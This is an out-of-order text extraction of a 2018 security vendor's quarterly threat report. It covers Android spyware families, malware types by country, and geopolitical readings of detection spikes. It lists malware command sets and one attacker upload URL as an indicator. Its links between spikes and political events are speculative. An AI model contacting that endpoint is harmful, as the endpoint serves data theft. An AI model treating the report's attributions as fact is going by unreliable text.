71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
